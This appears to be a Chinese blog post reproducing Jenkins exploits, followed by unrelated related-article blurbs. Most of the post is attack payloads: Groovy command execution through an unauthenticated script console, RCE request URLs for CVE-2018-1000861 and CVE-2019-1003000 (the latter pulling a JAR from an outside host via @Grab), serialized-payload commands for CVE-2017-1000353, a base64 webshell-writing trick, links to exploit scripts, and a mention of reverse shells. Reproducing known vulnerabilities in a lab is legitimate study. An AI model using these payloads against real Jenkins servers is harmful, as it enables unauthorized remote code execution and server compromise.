Jenkins漏洞利用复现

VSole2021-11-17 08:08:12

一、未授权访问

访问url:

http://172.16.20.134:8080/script

命令执行

println "ls -al".execute().text

也可以利用powershell 或者python脚本反弹shell

二、CVE-2018-1000861 远程命令执行漏洞

payload:

securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"touch /tmp/success".execute()  }}

&value=转成url编码

发送get请求:

python脚本:

https://github.com/orangetw/awesome-jenkins-rce-2019/blob/master/exp.py

三、CVE-2017-1000353 远程代码执行

工具地址:https://github.com/vulhub/CVE-2017-1000353

 https://ssd-disclosure.com/archives/3171

# 生成serjava -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar 1.ser "touch /tmp/1.jsp"
# 发送serpython exploit.py http://172.16.20.134:8080 1.ser

exploit.py这里要注释下,如果你使用代理的话可以添加,这里只是复现,用不到

 另外一个linux写shell的小技巧:

echo base64后的木马内容 |base64 -d > 1.js

jsp生成成功

四、CVE-2019-1003000  远程代码执行漏洞

漏洞利用

http://url.com/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='payload', root='http://poc.com')%0a@Grab(group='package', module='payload', version='1')%0aimport Payload;

poc.com是保存了JAR文件的服务器域名。

group、module、version的值对应了该jar文件的存放路径。

修改version的值,对应的jar包的访问路径和文件名也发生改变。

脚本:https://github.com/wetw0rk/Exploit-Development/blob/master/CVE-2019-1003000%20%26%26%20CVE-2018-1999002%20-%20preAuth%20Jenkins%20RCE/sploit/jenkins-preauth-rce-exploit.py

https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc

jenkinsjenkins使用
本作品采用《CC 协议》,转载必须注明作者和本文链接
DevOps 是 Development 和 Operations 组合的缩写词,它指的是一种协作方法,使企业的应用程序开发团队(Development team)和 IT 运营团队(Operations team)能够更好地沟通工作,DevOps的概念有助于使技术项目与业务需求保持一致,从而提高企业整体的工作效率 [1]。
将Sonar引入到代码开发的过程中,提供静态源代码安全扫描能力。
Scanners-Box 指引#简介#Scanners-Box是一个集合github平台上的安全行业从业人员自研开源扫描器的仓库,包括子域名枚举、数据库漏洞扫描、弱口令或信息泄漏扫描、端口扫描、指纹识别以及其他大型扫描器或模块化扫描器;该仓库只收录各位网友自己编写的一般性开源扫描器,类似nmap、w3af、brakeman等知名扫描工具不收录。
漏洞及渗透练习平台 数据库注入练习平台 花式扫描器 信息搜集工具 WEB工具 windows域渗透工具 漏洞利用及攻击框架 漏洞POC&EXP 中间人攻击及钓鱼 密码pj 二进制及代码分析工具 EXP编写框架及工具 隐写相关工具 各类安全资料 各类CTF资源 各类编程资源 Python
Jenkins Server 软件中的一个严重漏洞CVE-2019-17638可能导致内存损坏并导致机密信息泄露。Jenkins是最受欢迎的开源自动化服务器,由CloudBees和Jenkins社区维护。“ Jenkins 至和LTS 至捆绑了带有安全漏洞CVE-2019-17638的。此漏洞可能允许未经身份验证的攻击者获得HTTP响应报头,其中可能包含打算用于其他用户的敏感数据。”该漏洞影响Jetty和Jenkins Core,该漏洞在Jetty版本中引入,用于处理大型HTTP响应报头并防止缓冲区溢出。
逆推这个漏洞本身不难,主要记录下思路。
宣布:从 6 月 28 日发布的 Jenkins 2.357 和即将发布的 9 月 LTS 版本开始,Jenkins 最低需要 Java 11。自 2005 年成立以来,Jenkins 项目经历了多次 Java 迁移。
必修漏洞,就是必须修复、不可拖延的高危漏洞,不修复就意味着被黑客攻击入侵后会造成十分严重的后果。
云原生化成为企业数字化转型的高效方式,各大行业开始加速云原生化步伐。为了解决云原生安全带来的新挑战,提高应用服务全生命周期安全管理效率,国内某制造业企业通过青藤蜂巢·云原生安全平台,实现了这一目标。通过采用云原生架构,部署青藤蜂巢产品,为某制造业企业的数字化创新提供了坚实的基础支撑,最大限度的减少了安全瓶颈的发生频率。随着技术架构的升级,云原生在行业的应用范围还将会不断扩大。
VSole
网络安全专家